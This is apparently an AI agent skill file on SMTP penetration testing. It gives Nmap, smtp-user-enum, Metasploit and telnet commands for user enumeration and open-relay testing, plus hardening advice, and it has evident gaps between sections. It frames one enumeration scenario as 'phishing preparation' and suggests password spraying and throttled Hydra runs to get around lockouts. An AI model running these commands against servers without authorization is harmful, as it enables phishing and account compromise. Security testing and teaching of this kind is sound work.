This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". It provides comprehensive techniques for testing SMTP server security.
AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
SMTP Penetration Testing
Purpose
Conduct comprehensive security assessments of SMTP (Simple Mail Transfer Protocol) servers to identify vulnerabilities including open relays, user enumeration, weak authentication, and misconfiguration. This skill covers banner grabbing, user enumeration techniques, relay testing, brute force attacks, and security hardening recommendations.
Prerequisites
Required Tools
# Nmap with SMTP scripts
sudo apt-get install nmap
# Netcat
sudo apt-get install netcat
# Hydra for brute force
sudo apt-get install hydra
# SMTP user enumeration tool
sudo apt-get install smtp-user-enum
# Metasploit Framework
msfconsole
# Using smtp-user-enum with VRFY
smtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t TARGET_IP
# Using EXPN method
smtp-user-enum -M EXPN -U /usr/share/wordlists/users.txt -t TARGET_IP
# Using RCPT method
smtp-user-enum -M RCPT -U /usr/share/wordlists/users.txt -t TARGET_IP
# Specify port and domain
smtp-user-enum -M VRFY -U users.txt -t TARGET_IP -p 25 -d target.com
Using Metasploit:
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS TARGET_IP
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set UNIXONLY true
run
Using Nmap:
# SMTP user enumeration script
nmap --script smtp-enum-users -p 25 TARGET_IP
# With custom user list
nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -p 25 TARGET_IP
Phase 6: Open Relay Testing
Test for unauthorized email relay:
# Using Nmap
nmap -p 25 --script smtp-open-relay TARGET_IP
# Manual testing via Telnet
telnet TARGET_IP 25
HELO attacker.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Relay Test
This is a test.
.
QUIT
# If accepted (250 OK), server is open relay
Using Metasploit:
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS TARGET_IP
run
Scenario: Enumerate valid users for phishing preparation
# Method 1: VRFY
smtp-user-enum -M VRFY -U users.txt -t 192.168.1.100 -p 25
# Method 2: RCPT with timing analysis
smtp-user-enum -M RCPT -U users.txt -t 192.168.1.100 -p 25 -d target.com
# Method 3: Metasploit
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
run
# Results show valid users
[+] 192.168.1.100:25 - Found user: admin
[+] 192.168.1.100:25 - Found user: root
[+] 192.168.1.100:25 - Found user: postmaster
Example 3: Open Relay Exploitation
Scenario: Test and document open relay vulnerability
# Test via Telnet
telnet mail.target.com 25
HELO attacker.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
# If 250 OK - VULNERABLE
# Document with Nmap
nmap -p 25 --script smtp-open-relay --script-args [email protected],[email protected] mail.target.com
# Output:
# PORT STATE SERVICE
# 25/tcp open smtp
# |_smtp-open-relay: Server is an open relay (14/16 tests)
Troubleshooting
Issue
Cause
Solution
Connection Refused
Port blocked or closed
Check port with nmap; ISP may block port 25; try 587/465; use VPN
VRFY/EXPN Disabled
Server hardened
Use RCPT TO method; analyze response time/code variations
Brute Force Blocked
Rate limiting/lockout
Slow down (hydra -W 5); use password spraying; check for fail2ban
SSL/TLS Errors
Wrong port or protocol
Use 465 for SSL, 25/587 for STARTTLS; verify EHLO response
Security Recommendations
For Administrators
Disable Open Relay - Require authentication for external delivery
Disable VRFY/EXPN - Prevent user enumeration
Enforce TLS - Require STARTTLS for all connections
Implement SPF/DKIM/DMARC - Prevent email spoofing
Rate Limiting - Prevent brute force attacks
Account Lockout - Lock accounts after failed attempts
Banner Hardening - Minimize server information disclosure
Log Monitoring - Alert on suspicious activity
Patch Management - Keep SMTP software updated
Access Controls - Restrict SMTP to authorized IPs
When to Use
This skill is applicable to execute the workflow or actions described in the overview.